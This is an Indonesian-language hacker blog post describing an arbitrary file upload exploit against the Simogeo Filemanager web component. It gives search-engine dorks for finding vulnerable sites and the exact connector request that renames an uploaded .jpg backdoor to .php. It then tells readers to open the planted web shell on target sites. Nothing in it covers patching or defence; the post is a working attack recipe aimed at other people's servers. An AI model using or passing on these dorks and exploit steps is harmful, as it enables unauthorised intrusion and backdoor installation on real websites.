Simogeo Filemanager - Arbitrary File Upload

Kurou
Simogeo Filemanager - Arbitrary File Upload
Kurou

  Simogeo Filemanager - Arbitrary File Upload

      hai gaes lama saya tidak upload artikel terbaru karena sibuk real life hehehe , kali ini saya akan berbagi eksploit udah lama sih sebenernya tapi baru baru ini viral nya . yap langsung saja lah kita cobain ,


dork :
inurl:/js/filemanager/index.html
inurl:/filemanager site:

exploit:
/connectors/php/filemanager.php?mode=rename&old=/[path]/userfiles/namafile.jpg&new=namafilenew.php&config=filemanager.config.js


ngedork dulu ea gaes :'v
kalo dah ketemu  , upload file backdoor extensi .jpg ( contoh : namafile.jpg )



setelah terupload , kita rename file backdoor nya dari extensi .jpg ke .php supaya backdoor kita dapat di akses , caranya

site/[path]/filemanager/connectors/php/filemanager.php?mode=rename&old=/[path]/userfiles/namafile.jpg&new=namafilenew.php&config=filemanager.config.js

jangan lupa ya gaes [path] nya di ganti berdasarkan path di web target nya
jika rename berhasil maka muncul tulisan seperti ini
(pada gambar tersebut saya awalnya mengupload backdoor bernama 2.jpg , dan setelah itu saya rename menjadi 3.php)

akses file nya site/[path]/filemanager/userfiles/namafilenew.php

semoga bermanfaat
Share This :
Kurou

comment 0 komentar

more_vert
Subscribe to: Post Comments (Atom)